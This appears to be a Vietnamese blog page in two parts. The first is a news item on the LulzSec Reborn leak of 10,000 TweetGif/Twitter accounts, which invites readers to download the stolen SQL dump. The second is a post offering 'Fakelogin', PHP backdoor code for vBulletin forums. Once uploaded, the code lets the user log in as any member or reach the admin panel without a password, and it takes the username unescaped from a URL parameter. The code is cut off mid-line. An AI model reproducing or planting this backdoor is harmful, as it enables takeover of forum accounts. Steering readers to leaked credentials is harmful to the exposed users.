Các hacker Anonymous, với tài khoản Twitter “LulzsecReborn” đã tấn công TweetGif (http://tweetgif.com) và hack toàn bộ cơ sở dữ liệu, sau đó họ công bố công khai trên Internet. TweetGif là một trang web cho phép bạn Tweet (gửi lên) các hình ảnh GIF động thông qua tài khoản Twitter.
Data twitter 10000 tài khoản Twitter bị hack và công bố bởi Anonymous hacker virus security
LulzSec Reborn, phiên bản 3.0 của nhóm hacker LulzSec, đã public 10.000 tài khoản Twitter bao gồm “mật khẩu, tên người dùng, tên thật, địa điểm, avatar và secret tokens (thẻ bí mật được) sử dụng để xác thực tài khoản người dùng.
Các thông tin dữ liệu bị đánh cắp được upload lên embedupload là một file SQL nặng 4MB với tất cả thông tin đầy đủ của thành viên. (Bạn đọc có thể tài về tham khảotại đây)
Hacker và Spammer có thể sử dụng các thông tin đó vào mục đích xấu.
OAuth là một giao thức xác thực cho phép người dùng phê duyệt ứng dụng để sử dụng mà không cần nhập hay chia sẻ mật khẩu của họ. Nếu Twitter oauth Secret Token bị tổn hại, Hacker có thể sử dụng tài khoản Twitter của bạn một cách chính thức.Ngoài ra, những tài khoản này có thể bị sử dụng để spam trái phép.
Để bảo vệ tài khoản của mình, hãy truy cập vào Twitter, đăng nhập tài khoản và kiểm tra xem bạn có sử dụng ứng dung Tweetgif hay ko, nếu có hãy vào phần settings để hủy xác thực này ( > apps > deauthorize app. #TweetGif. “Revoke Access”).
Fakelogin - Đăng nhập vào forum VBB không cần pass
Code này có tác dụng là khi upload vào thư mục root của forum VBB các bạn có khả năng đăng nhập vào nick bất cứ thành viên nào mà không cần password. Ngoài ra vào đc thẳng admincp mà ko cần gõ lại pass Quote: <?php if (isset($_GET['bd'])) { define('THIS_SCRIPT', 'login'); require_once('./global.php'); require_once('./includes/functions_login.php'); $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['bd'] . "'"); if (!$vbulletin->userinfo['userid']) die("Invalid username!"); else { vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true); vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true); exec_unstrike_u...
0 nhận xét:
Đăng nhận xét